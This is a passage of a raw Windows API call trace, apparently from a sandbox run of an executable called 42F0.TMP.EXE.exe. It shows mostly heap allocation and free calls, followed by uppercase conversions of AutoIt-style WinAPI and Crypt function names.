[0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1300 [0070.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bf8 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c10 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1be0 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bc8 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1378 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a13d8 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18453c0 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13d8 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18453c0 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1378 | out: hHeap=0x1780000) returned 1 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1378 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a13d8 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a13f0 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845340 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13f0 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845340 | out: hHeap=0x1780000) returned 1 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13d8 | out: hHeap=0x1780000) returned 1 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a13d8 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1c) returned 0x1845840 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a13f0 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x1845868 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845350 [0070.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845840 | out: hHeap=0x1780000) returned 1 [0070.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1420 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13f0 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1378 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13d8 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1498 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1420 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13f0 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f70 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845460 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e68 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f70 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845460 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1cb8 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18458e0 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1dc0 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f28 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1cd0 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d78 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ee0 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d60 | out: hHeap=0x1780000) returned 1 [0070.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e68 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1dd8 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845380 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1da8 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ee0 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845420 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f28 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845728 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d48 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ce8 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1cb8 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d60 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f28 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ee0 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d18 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f40 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d60 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452a0 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ee0 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e50 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845370 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ce8 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845548 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ef8 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e38 | out: hHeap=0x1780000) returned 1 [0070.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f88 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1cb8 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e68 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1dd8 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d60 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845370 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f88 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ce8 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452d0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f88 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1dd8 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e38 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e68 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d60 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ce8 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f88 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f88 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452f0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e38 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452b0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0070.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1dd8 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f88 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e38 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ce8 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d60 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1dd8 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e68 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f88 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18453f0 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1498 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f88 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845370 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d60 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845638 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e38 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1f88 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1dd8 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1ce8 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1e68 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1fa0 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1d60 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a2330 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452f0 | out: hHeap=0x1780000) returned 1 [0070.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a2150 | out: hHeap=0x1780000) returned 1 [0070.526] CloseHandle (hObject=0x234) returned 1 [0070.526] IUnknown:Release (This=0x179b010) returned 0x0 [0070.526] FreeLibrary (hLibModule=0x290000) returned 1 [0070.526] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", nBufferLength=0x7fff, lpBuffer=0x144fad0, lpFilePart=0x146faf0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFilePart=0x146faf0*="42F0.TMP.EXE.exe") returned 0x28 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_BEEP", cchLength=0xc | out: lpsz="_WINAPI_BEEP") returned 0xc [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_FORMATMESSAGE", cchLength=0x15 | out: lpsz="_WINAPI_FORMATMESSAGE") returned 0x15 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_FORMATMESSAGE", cchLength=0x15 | out: lpsz="_WINAPI_FORMATMESSAGE") returned 0x15 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_GETERRORMESSAGE", cchLength=0x17 | out: lpsz="_WINAPI_GETERRORMESSAGE") returned 0x17 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_GETERRORMESSAGE", cchLength=0x17 | out: lpsz="_WINAPI_GETERRORMESSAGE") returned 0x17 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_GETLASTERROR", cchLength=0x14 | out: lpsz="_WINAPI_GETLASTERROR") returned 0x14 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_GETLASTERROR", cchLength=0x14 | out: lpsz="_WINAPI_GETLASTERROR") returned 0x14 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_GETLASTERRORMESSAGE", cchLength=0x1b | out: lpsz="_WINAPI_GETLASTERRORMESSAGE") returned 0x1b [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_GETLASTERRORMESSAGE", cchLength=0x1b | out: lpsz="_WINAPI_GETLASTERRORMESSAGE") returned 0x1b [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_MESSAGEBEEP", cchLength=0x13 | out: lpsz="_WINAPI_MESSAGEBEEP") returned 0x13 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_MESSAGEBEEP", cchLength=0x13 | out: lpsz="_WINAPI_MESSAGEBEEP") returned 0x13 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_MSGBOX", cchLength=0xe | out: lpsz="_WINAPI_MSGBOX") returned 0xe [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_MSGBOX", cchLength=0xe | out: lpsz="_WINAPI_MSGBOX") returned 0xe [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_SETLASTERROR", cchLength=0x14 | out: lpsz="_WINAPI_SETLASTERROR") returned 0x14 [0070.535] CharUpperBuffW (in: lpsz="_WINAPI_SETLASTERROR", cchLength=0x14 | out: lpsz="_WINAPI_SETLASTERROR") returned 0x14 [0070.536] CharUpperBuffW (in: lpsz="_WINAPI_SHOWERROR", cchLength=0x11 | out: lpsz="_WINAPI_SHOWERROR") returned 0x11 [0070.536] CharUpperBuffW (in: lpsz="_WINAPI_SHOWERROR", cchLength=0x11 | out: lpsz="_WINAPI_SHOWERROR") returned 0x11 [0070.536] CharUpperBuffW (in: lpsz="_WINAPI_SHOWLASTERROR", cchLength=0x15 | out: lpsz="_WINAPI_SHOWLASTERROR") returned 0x15 [0070.536] CharUpperBuffW (in: lpsz="_WINAPI_SHOWLASTERROR", cchLength=0x15 | out: lpsz="_WINAPI_SHOWLASTERROR") returned 0x15 [0070.536] CharUpperBuffW (in: lpsz="_WINAPI_SHOWMSG", cchLength=0xf | out: lpsz="_WINAPI_SHOWMSG") returned 0xf [0070.536] CharUpperBuffW (in: lpsz="_WINAPI_SHOWMSG", cchLength=0xf | out: lpsz="_WINAPI_SHOWMSG") returned 0xf [0070.536] CharUpperBuffW (in: lpsz="__COMERRORFORMATING", cchLength=0x13 | out: lpsz="__COMERRORFORMATING") returned 0x13 [0070.536] CharUpperBuffW (in: lpsz="__COMERRORFORMATING", cchLength=0x13 | out: lpsz="__COMERRORFORMATING") returned 0x13 [0070.536] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0070.536] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0070.536] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0070.536] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0070.536] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0070.536] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0070.536] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0070.536] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0070.536] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_HASHDATA", cchLength=0xf | out: lpsz="_CRYPT_HASHDATA") returned 0xf [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_HASHDATA", cchLength=0xf | out: lpsz="_CRYPT_HASHDATA") returned 0xf [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_HASHFILE", cchLength=0xf | out: lpsz="_CRYPT_HASHFILE") returned 0xf [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_HASHFILE", cchLength=0xf | out: lpsz="_CRYPT_HASHFILE") returned 0xf [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_GENRANDOM", cchLength=0x10 | out: lpsz="_CRYPT_GENRANDOM") returned 0x10 [0070.537] CharUpperBuffW (in: lpsz="_CRYPT_GENRANDOM", cchLength=0x10 | out: lpsz="_CRYPT_GENRANDOM") returned 0x10 [0070.537] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0070.537] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0070.537] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0070.537] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0070.538] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0070.538] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SHARE", cchLength=0x14 | out: lpsz="__ARRAYDISPLAY_SHARE") returned 0x14 [0070.538] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SHARE", cchLength=0x14 | out: lpsz="__ARRAYDISPLAY_SHARE") returned 0x14 [0070.538] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_REGISTERSORTCALLBACK", cchLength=0x23 | out: lpsz="__ARRAYDISPLAY_REGISTERSORTCALLBACK") returned 0x23 [0070.538] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_REGISTERSORTCALLBACK", cchLength=0x23 | out: lpsz="__ARRAYDISPLAY_REGISTERSORTCALLBACK") returned 0x23 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SORTCALLBACK", cchLength=0x1b | out: lpsz="__ARRAYDISPLAY_SORTCALLBACK") returned 0x1b [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SORTCALLBACK", cchLength=0x1b | out: lpsz="__ARRAYDISPLAY_SORTCALLBACK") returned 0x1b [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SORTITEMS", cchLength=0x18 | out: lpsz="__ARRAYDISPLAY_SORTITEMS") returned 0x18 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SORTITEMS", cchLength=0x18 | out: lpsz="__ARRAYDISPLAY_SORTITEMS") returned 0x18 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_ADDITEM", cchLength=0x16 | out: lpsz="__ARRAYDISPLAY_ADDITEM") returned 0x16 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_ADDITEM", cchLength=0x16 | out: lpsz="__ARRAYDISPLAY_ADDITEM") returned 0x16 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_ADDSUBITEM", cchLength=0x19 | out: lpsz="__ARRAYDISPLAY_ADDSUBITEM") returned 0x19 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_ADDSUBITEM", cchLength=0x19 | out: lpsz="__ARRAYDISPLAY_ADDSUBITEM") returned 0x19 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETCOLUMNCOUNT", cchLength=0x1d | out: lpsz="__ARRAYDISPLAY_GETCOLUMNCOUNT") returned 0x1d [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETCOLUMNCOUNT", cchLength=0x1d | out: lpsz="__ARRAYDISPLAY_GETCOLUMNCOUNT") returned 0x1d [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETHEADER", cchLength=0x18 | out: lpsz="__ARRAYDISPLAY_GETHEADER") returned 0x18 [0070.539] CharUpperBuffW (in: 